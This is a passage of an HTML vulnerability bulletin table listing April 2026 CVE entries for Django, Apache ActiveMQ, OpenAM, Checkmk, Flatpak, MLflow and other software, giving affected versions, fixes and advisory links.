<a href=3D"https://openmeetings.apache.org/openmeetings-db/apidocs/org.apac= he.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html" ta= rget=3D"_blank" rel=3D"noopener">https://openmeetings.apache.org/openmeetin= gs-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/fil= e/FileItemDTO.html</a><br><a href=3D"https://lists.apache.org/thread/pttopr= d628g3xr6lpp3bm1z8m3z8t4p7" target=3D"_blank" rel=3D"noopener">https://list= s.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">djangoproject--Django</td>
<td>An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2=
before 4.2.30. `MultiPartParser` allows remote attackers to degrade perfor= mance by submitting multipart uploads with `Content-Transfer-Encoding: base= 64` including excessive whitespace. Earlier, unsupported Django series (suc=
h as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. = Django would like to thank Seokchan Yoon for reporting this issue.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33033" target=3D= "_blank" rel=3D"noopener">CVE-2026-33033</a></td>

<a href=3D"https://docs.djangoproject.com/en/dev/releases/security/" target= =3D"_blank" rel=3D"noopener">Django security archive</a><br><a href=3D"http= s://groups.google.com/g/django-announce" target=3D"_blank" rel=3D"noopener"= >Django releases announcements</a><br><a href=3D"https://www.djangoproject.= com/weblog/2026/apr/07/security-releases/" target=3D"_blank" rel=3D"noopene= r">Django security releases issued: 6.0.4, 5.2.13, and 4.2.30</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">djangoproject--Django</td>
<td>An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2=
before 4.2.30. ASGI requests with a missing or understated `Content-Length=
` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading = `HttpRequest.body`, allowing remote attackers to load an unbounded request = body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x,=
and 3.2.x) were not evaluated and may also be affected. Django would like =
to thank Superior for reporting this issue.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33034" target=3D= "_blank" rel=3D"noopener">CVE-2026-33034</a></td>

<a href=3D"https://docs.djangoproject.com/en/dev/releases/security/" target= =3D"_blank" rel=3D"noopener">Django security archive</a><br><a href=3D"http= s://groups.google.com/g/django-announce" target=3D"_blank" rel=3D"noopener"= >Django releases announcements</a><br><a href=3D"https://www.djangoproject.= com/weblog/2026/apr/07/security-releases/" target=3D"_blank" rel=3D"noopene= r">Django security releases issued: 6.0.4, 5.2.13, and 4.2.30</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">Six Apart Ltd.--Movable Type</td>
<td>Movable Type provided by Six Apart Ltd. contains an SQL Injection vulne= rability which may allow an attacker to execute an arbitrary SQL statement.= </td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33088" target=3D= "_blank" rel=3D"noopener">CVE-2026-33088</a></td>

<a href=3D"https://movabletype.org/news/2026/04/mt-907-released.html" targe= t=3D"_blank" rel=3D"noopener">https://movabletype.org/news/2026/04/mt-907-r= eleased.html</a><br><a href=3D"https://www.sixapart.jp/movabletype/news/202= 6/04/08-1100.html" target=3D"_blank" rel=3D"noopener">https://www.sixapart.= jp/movabletype/news/2026/04/08-1100.html</a><br><a href=3D"https://jvn.jp/e= n/jp/JVN66473735/" target=3D"_blank" rel=3D"noopener">https://jvn.jp/en/jp/= JVN66473735/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Acronis--Acronis True Image OEM</td>
<td>Local privilege escalation due to improper handling of environment vari= ables. The following products are affected: Acronis True Image OEM (macOS) = before build 42571, Acronis True Image (macOS) before build 42902.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33092" target=3D= "_blank" rel=3D"noopener">CVE-2026-33092</a></td>

<a href=3D"https://security-advisory.acronis.com/advisories/SEC-9407" targe= t=3D"_blank" rel=3D"noopener">SEC-9407</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache ActiveMQ Cl= ient</td>
<td>Improper validation and restriction of a classpath path name vulnerabil= ity in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All,=
Apache ActiveMQ Web, Apache ActiveMQ. In two instances (when creating a St= omp consumer and also browsing messages in the Web console) an authenticate=
d user provided "key" value could be constructed to traverse the classpath = due to path concatenation. As a result, the application is exposed to a cla= sspath path resource loading vulnerability that could potentially be chaine=
d together with another attack to lead to exploit. This issue affects Apach=
e ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ = Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before=
5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from = 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2=
. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes = the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that is limited =
to non-Windows environments due to a path separator resolution bug fixed in=
5.19.4 and 6.2.3.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33227" target=3D= "_blank" rel=3D"noopener">CVE-2026-33227</a></td>

<a href=3D"https://activemq.apache.org/security-advisories.data/CVE-2026-33= 227-announcement.txt" target=3D"_blank" rel=3D"noopener">https://activemq.a= pache.org/security-advisories.data/CVE-2026-33227-announcement.txt</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">xwiki--xwiki-platform</td>
<td>XWiki Platform is a generic wiki platform offering runtime services for=
applications built on top of it. Prior to 17.4.8 and 17.10.1, an improperl=
y protected scripting API allows any user with script right to bypass the s= andboxing of the Velocity scripting API and execute, e.g., arbitrary Python=
scripts, allowing full access to the XWiki instance and thereby compromisi=
ng the confidentiality, integrity and availability of the whole instance. N= ote that script right already constitutes a high level of access that we do= n't recommend giving to untrusted users. This vulnerability is fixed in 17.= 4.8 and 17.10.1.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33229" target=3D= "_blank" rel=3D"noopener">CVE-2026-33229</a></td>

<a href=3D"https://github.com/xwiki/xwiki-platform/security/advisories/GHSA= -h259-74h5-4rh9" target=3D"_blank" rel=3D"noopener">https://github.com/xwik= i/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9</a><br><a href=3D"= https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a= 4acd15a46e63" target=3D"_blank" rel=3D"noopener">https://github.com/xwiki/x= wiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63</a><br><a hre= f=3D"https://jira.xwiki.org/browse/XWIKI-23698" target=3D"_blank" rel=3D"no= opener">https://jira.xwiki.org/browse/XWIKI-23698</a><br><a href=3D"https:/= /jira.xwiki.org/browse/XWIKI-23702" target=3D"_blank" rel=3D"noopener">http= s://jira.xwiki.org/browse/XWIKI-23702</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache OpenMeeting= s</td>
<td>Use of Hard-coded Cryptographic Key vulnerability in Apache OpenMeeting=
s. The remember-me cookie encryption key is set to default value in openmee= tings.properties and not being auto-rotated. In case OM admin hasn't change=
d the default encryption key, an attacker who has stolen a cookie from a lo= gged-in user can get full user credentials. This issue affects Apache OpenM= eetings: from 6.1.0 before 9.0.0. Users are recommended to upgrade to versi=
on 9.0.0, which fixes the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33266" target=3D= "_blank" rel=3D"noopener">CVE-2026-33266</a></td>

<a href=3D"https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/b05jnp= 9563v49zq494lox9kjbhhf2w66</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">ICZ Corporation--MATCHA INVOICE</td> <td>Unrestricted upload of file with dangerous type issue exists in MATCHA = INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary=
file may be created by an administrator of the product. As a result, arbit= rary code may be executed on the server.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33273" target=3D= "_blank" rel=3D"noopener">CVE-2026-33273</a></td>

<a href=3D"https://oss.icz.co.jp/news/?p=3D1386" target=3D"_blank" rel=3D"n= oopener">https://oss.icz.co.jp/news/?p=3D1386</a><br><a href=3D"https://jvn= .jp/en/jp/JVN33581068/" target=3D"_blank" rel=3D"noopener">https://jvn.jp/e= n/jp/JVN33581068/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenIdentityPlatform--OpenAM</td>
<td>Open Access Management (OpenAM) is an access management solution. Prior=
to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication=
Remote Code Execution (RCE) via unsafe Java deserialization of the jato.cl= ientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mi= tigation that was applied to the jato.pageSession parameter after CVE-2021-= 35464. An unauthenticated attacker can achieve arbitrary command execution =
on the server by sending a crafted serialized Java object as the jato.clien= tSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contain=
s &lt;jato:form&gt; tags (e.g., the Password Reset pages). This vulnerabili=
ty is fixed in 16.0.6.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33439" target=3D= "_blank" rel=3D"noopener">CVE-2026-33439</a></td>

<a href=3D"https://github.com/OpenIdentityPlatform/OpenAM/security/advisori= es/GHSA-2cqq-rpvq-g5qj" target=3D"_blank" rel=3D"noopener">https://github.c= om/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj</a><= br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Checkmk GmbH--Checkmk</td>
<td>Livestatus injection in the monitoring quicksearch in Checkmk &lt;2.5.0=
b4 allows an authenticated attacker to inject livestatus commands via the s= earch query due to insufficient input sanitization in search filter plugins= .</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33455" target=3D= "_blank" rel=3D"noopener">CVE-2026-33455</a></td>

<a href=3D"https://checkmk.com/werk/17988" target=3D"_blank" rel=3D"noopene= r">https://checkmk.com/werk/17988</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Checkmk GmbH--Checkmk</td>
<td>Livestatus injection in the notification test mode in Checkmk &lt;2.5.0=
b4 and &lt;2.4.0p26 allows an authenticated user with access to the notific= ation test page to inject arbitrary Livestatus commands via a crafted servi=
ce description.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33456" target=3D= "_blank" rel=3D"noopener">CVE-2026-33456</a></td>

<a href=3D"https://checkmk.com/werk/17989" target=3D"_blank" rel=3D"noopene= r">https://checkmk.com/werk/17989</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Checkmk GmbH--Checkmk</td>
<td>Livestatus injection in the prediction graph page in Checkmk &lt;2.5.0b=
4, &lt;2.4.0p26, and &lt;2.3.0p47 allows an authenticated user to inject ar= bitrary Livestatus commands via a crafted service name parameter due to ins= ufficient sanitization of the service description value.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33457" target=3D= "_blank" rel=3D"noopener">CVE-2026-33457</a></td>

<a href=3D"https://checkmk.com/werk/17990" target=3D"_blank" rel=3D"noopene= r">https://checkmk.com/werk/17990</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, a chaine=
d attack can enable otherwise-blocked PHP code from the main/install/ direc= tory and allow an unauthenticated attacker to modify existing files or crea=
te new files where allowed by system permissions. This only affects portals=
with the main/install/ directory still present and read-accessible. This v= ulnerability is fixed in 1.11.38.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33698" target=3D= "_blank" rel=3D"noopener">CVE-2026-33698</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 557g-2w66-gpmf" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b= 62ed33e51" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an In= secure Direct Object Reference (IDOR) vulnerability in the /social-network/= personal-data/{userId} endpoint allows any authenticated user to access ful=
l personal data and API tokens of arbitrary users by modifying the userId p= arameter. This results in mass disclosure of sensitive user information and=
credentials, enabling a full platform data breach. This vulnerability is f= ixed in 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33703" target=3D= "_blank" rel=3D"noopener">CVE-2026-33703</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 27x6-c5c7-gpf5" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--crypto/x509</td>
<td>When verifying a certificate chain containing excluded DNS constraints,=
these constraints are not correctly applied to wildcard DNS SANs which use=
a different case than the constraint. This only affects validation of othe= rwise trusted certificate chains, issued by a root CA in the VerifyOptions.= Roots CertPool, or in the system certificate pool.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33810" target=3D= "_blank" rel=3D"noopener">CVE-2026-33810</a></td>

<a href=3D"https://go.dev/cl/763763" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/763763</a><br><a href=3D"https://go.dev/issue/78332" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78332</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4866" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4866</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">github.com/jackc/pgx/v5--github.com/jackc/pgx/= v5/pgproto3</td>
<td>Memory-safety vulnerability in github.com/jackc/pgx/v5.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33815" target=3D= "_blank" rel=3D"noopener">CVE-2026-33815</a></td>

<a href=3D"https://pkg.go.dev/vuln/GO-2026-4771" target=3D"_blank" rel=3D"n= oopener">https://pkg.go.dev/vuln/GO-2026-4771</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">github.com/jackc/pgx/v5--github.com/jackc/pgx/= v5/pgproto3</td>
<td>Memory-safety vulnerability in github.com/jackc/pgx/v5.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33816" target=3D= "_blank" rel=3D"noopener">CVE-2026-33816</a></td>

<a href=3D"https://pkg.go.dev/vuln/GO-2026-4772" target=3D"_blank" rel=3D"n= oopener">https://pkg.go.dev/vuln/GO-2026-4772</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Mlflow--Mlflow</td>
<td>MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by uns= afe parsing of YAML-based MLmodel artifacts in its web interface. An authen= ticated attacker can upload a malicious MLmodel file containing a payload t= hat executes when another user views the artifact in the UI. This allows ac= tions such as session hijacking or performing operations on behalf of the v= ictim. This issue affects MLflow version through 3.10.1</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33865" target=3D= "_blank" rel=3D"noopener">CVE-2026-33865</a></td>

<a href=3D"https://github.com/mlflow/mlflow/pull/21435" target=3D"_blank" r= el=3D"noopener">https://github.com/mlflow/mlflow/pull/21435</a><br><a href= =3D"https://cert.pl/en/posts/2026/04/CVE-2026-33865/" target=3D"_blank" rel= =3D"noopener">https://cert.pl/en/posts/2026/04/CVE-2026-33865/</a><br><a hr= ef=3D"https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-atta= ck-vectors" target=3D"_blank" rel=3D"noopener">https://afine.com/blogs/atta= cking-mlflow-how-ml-artifacts-become-attack-vectors</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Mlflow--Mlflow</td>
<td>MLflow is vulnerable to an authorization bypass affecting the AJAX endp= oint used to download saved model artifacts. Due to missing access=E2=80=91= control validation, a user without permissions to a given experiment can di= rectly query this endpoint and retrieve model artifacts they are not author= ized to access. This issue affects MLflow version through 3.10.1</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33866" target=3D= "_blank" rel=3D"noopener">CVE-2026-33866</a></td>

<a href=3D"https://github.com/mlflow/mlflow/pull/21708" target=3D"_blank" r= el=3D"noopener">https://github.com/mlflow/mlflow/pull/21708</a><br><a href= =3D"https://cert.pl/en/posts/2026/04/CVE-2026-33865/" target=3D"_blank" rel= =3D"noopener">https://cert.pl/en/posts/2026/04/CVE-2026-33865/</a><br><a hr= ef=3D"https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-atta= ck-vectors" target=3D"_blank" rel=3D"noopener">https://afine.com/blogs/atta= cking-mlflow-how-ml-artifacts-become-attack-vectors</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache OpenMeeting= s</td>
<td>Use of GET Request Method With Sensitive Query Strings vulnerability in=
Apache OpenMeetings. The REST login endpoint uses HTTP GET method with use= rname and password passed as query parameters.=C2=A0Please check references=
regarding possible impact This issue affects Apache OpenMeetings: from 3.1=
.3 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which f= ixes the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34020" target=3D= "_blank" rel=3D"noopener">CVE-2026-34020</a></td>

<a href=3D"https://owasp.org/www-community/vulnerabilities/Information_expo= sure_through_query_strings_in_url" target=3D"_blank" rel=3D"noopener">https= ://owasp.org/www-community/vulnerabilities/Information_exposure_through_que= ry_strings_in_url</a><br><a href=3D"https://lists.apache.org/thread/2h3h9do= 5tp17xldr0nps1yjmkx4vs3db" target=3D"_blank" rel=3D"noopener">https://lists= .apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">flatpak--flatpak</td>
<td>Flatpak is a Linux application sandboxing and distribution framework. P= rior to 1.16.4, the Flatpak portal accepts paths in the sandbox-expose opti= ons which can be app-controlled symlinks pointing at arbitrary paths. Flatp=
ak run mounts the resolved host path in the sandbox. This gives apps access=
to all host files and can be used as a primitive to gain code execution in=
the host context. This vulnerability is fixed in 1.16.4.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34078" target=3D= "_blank" rel=3D"noopener">CVE-2026-34078</a></td>

<a href=3D"https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q= -qc34-jprg" target=3D"_blank" rel=3D"noopener">https://github.com/flatpak/f= latpak/security/advisories/GHSA-cc2q-qc34-jprg</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">flatpak--flatpak</td>
<td>Flatpak is a Linux application sandboxing and distribution framework. P= rior to 1.16.4, the caching for ld.so removes outdated cache files without = properly checking that the app controlled path to the outdated cache is in = the cache directory. This allows Flatpak apps to delete arbitrary files on = the host. This vulnerability is fixed in 1.16.4.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34079" target=3D= "_blank" rel=3D"noopener">CVE-2026-34079</a></td>

<a href=3D"https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x= -r292-46pp" target=3D"_blank" rel=3D"noopener">https://github.com/flatpak/f= latpak/security/advisories/GHSA-p29x-r292-46pp</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">flatpak--xdg-dbus-proxy</td>
<td>xdg-dbus-proxy is a filtering proxy for D-Bus connections. Prior to 0.1= .7, a policy parser vulnerability allows bypassing eavesdrop restrictions. = The proxy checks for eavesdrop=3Dtrue in policy rules but fails to handle e= avesdrop =3D'true' (with a space before the equals sign) and similar cases.=
Clients can intercept D-Bus messages they should not have access to. This = vulnerability is fixed in 0.1.7.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34080" target=3D= "_blank" rel=3D"noopener">CVE-2026-34080</a></td>

<a href=3D"https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GH= SA-vjp5-hjfm-7677" target=3D"_blank" rel=3D"noopener">https://github.com/fl= atpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">Hydrosystem--Control System</td>
<td>Hydrosystem Control System does not enforce authorization for some dire= ctories. This allows an unauthorized attacker to read all files in these di= rectories and even execute some of them. Critically the attacker could run = PHP scripts directly on the connected database.This issue was fixed in=C2= =A0Hydrosystem Control System version=C2=A09.8.5</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34184" target=3D= "_blank" rel=3D"noopener">CVE-2026-34184</a></td>

<a href=3D"https://cert.pl/posts/2026/04/CVE-2026-4901/" target=3D"_blank" = rel=3D"noopener">https://cert.pl/posts/2026/04/CVE-2026-4901/</a><br><a hre= f=3D"https://www.hydrosystem.poznan.pl/" target=3D"_blank" rel=3D"noopener"= >https://www.hydrosystem.poznan.pl/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Hydrosystem--Control System</td>
<td>Hydrosystem Control System is vulnerable to SQL Injection across most s= cripts and input parameters. Because no protections are in place, an authen= ticated attacker can inject arbitrary SQL commands, potentially gaining ful=
l control over the database.This issue was fixed in Hydrosystem Control Sys= tem version 9.8.5</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34185" target=3D= "_blank" rel=3D"noopener">CVE-2026-34185</a></td>

<a href=3D"https://cert.pl/posts/2026/04/CVE-2026-4901/" target=3D"_blank" = rel=3D"noopener">https://cert.pl/posts/2026/04/CVE-2026-4901/</a><br><a hre= f=3D"https://www.hydrosystem.poznan.pl/" target=3D"_blank" rel=3D"noopener"= >https://www.hydrosystem.poznan.pl/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache ActiveMQ Br= oker</td>
<td>Improper Input Validation, Improper Control of Generation of Code ('Cod=
e Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apa= che ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ o=
n the web console. The default Jolokia access policy permits exec operation=
s on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.a= ddNetworkConnector(String) and BrokerService.addConnector(String). An authe= nticated attacker can invoke these operations with a crafted discovery URI = that triggers the VM transport's brokerConfig parameter to load a remote Sp= ring XML application context using ResourceXmlApplicationContext. Because S= pring's ResourceXmlApplicationContext instantiates all singleton beans befo=
re the BrokerService validates the configuration, arbitrary code execution = occurs on the broker's JVM through bean factory methods such as Runtime.exe= c(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 b= efore 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; A= pache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommend=
ed to upgrade to version 5.19.4 or 6.2.3, which fixes the issue</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34197" target=3D= "_blank" rel=3D"noopener">CVE-2026-34197</a></td>

<a href=3D"https://activemq.apache.org/security-advisories.data/CVE-2026-34= 197-announcement.txt" target=3D"_blank" rel=3D"noopener">https://activemq.a= pache.org/security-advisories.data/CVE-2026-34197-announcement.txt</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">nyariv--SandboxJS</td>
<td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, the @nya= riv/sandboxjs parser contains unbounded recursion in the restOfExp function=
and the lispify/lispifyExpr call chain. An attacker can crash any Node.js = process that parses untrusted input by supplying deeply nested expressions = (e.g., ~2000 nested parentheses), causing a RangeError: Maximum call stack = size exceeded that terminates the process. This vulnerability is fixed in 0= .8.36.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34211" target=3D= "_blank" rel=3D"noopener">CVE-2026-34211</a></td>

<a href=3D"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pf= c-jjgw-6g26" target=3D"_blank" rel=3D"noopener">https://github.com/nyariv/S= andboxJS/security/advisories/GHSA-8pfc-jjgw-6g26</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">nyariv--SandboxJS</td>
<td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, a scope = modification vulnerability exists in @nyariv/sandboxjs. The vulnerability a= llows untrusted sandboxed code to leak internal interpreter objects through=
the new operator, exposing sandbox scope objects in the scope hierarchy to=
untrusted code; an unexpected and undesired exploit. While this could allo=
w modifying scopes inside the sandbox, code evaluation remains sandboxed an=
d prototypes remain protected throughout the execution. This vulnerability =
is fixed in 0.8.36.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34217" target=3D= "_blank" rel=3D"noopener">CVE-2026-34217</a></td>

<a href=3D"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg7= 3-4w7g-q96w" target=3D"_blank" rel=3D"noopener">https://github.com/nyariv/S= andboxJS/security/advisories/GHSA-hg73-4w7g-q96w</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1, customers in shared organizations (means they can see each oth= er's tickets) could see fields which are not intended for customers - inclu= ding fields not intended for them at all (e.g. priority, custom ticket attr= ibutes for internal purposes). This was the case when a customer opened a t= icket from another user of the same shared organization. They are not able =
to modify these field. This vulnerability is fixed in 7.0.1.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34248" target=3D= "_blank" rel=3D"noopener">CVE-2026-34248</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-prww-8= 4vh-w978" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-prww-84vh-w978</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Sonatype--Nexus Repository</td>
<td>A reflected cross-site scripting vulnerability exists in Sonatype Nexus=
Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remot=
e attackers to execute arbitrary JavaScript in a victim's browser through a=
specially crafted URL. Exploitation requires user interaction.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3438" target=3D"= _blank" rel=3D"noopener">CVE-2026-3438</a></td>

<a href=3D"https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-re= lease-notes.html" target=3D"_blank" rel=3D"noopener">https://help.sonatype.= com/en/sonatype-nexus-repository-3-91-0-release-notes.html</a><br><a href= =3D"https://support.sonatype.com/hc/en-us/articles/50609137161363" target= =3D"_blank" rel=3D"noopener">https://support.sonatype.com/hc/en-us/articles= /50609137161363</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">scoder--lupa</td>
<td>Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and=
earlier, attribute_filter is not consistently applied when attributes are = accessed through built-in functions like getattr and setattr. This allows a=
n attacker to bypass the intended restrictions and eventually achieve arbit= rary code execution.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34444" target=3D= "_blank" rel=3D"noopener">CVE-2026-34444</a></td>

<a href=3D"https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr= 6-6gjm" target=3D"_blank" rel=3D"noopener">https://github.com/scoder/lupa/s= ecurity/advisories/GHSA-69v7-xpr6-6gjm</a><br>=C2=A0</td>
</tr>

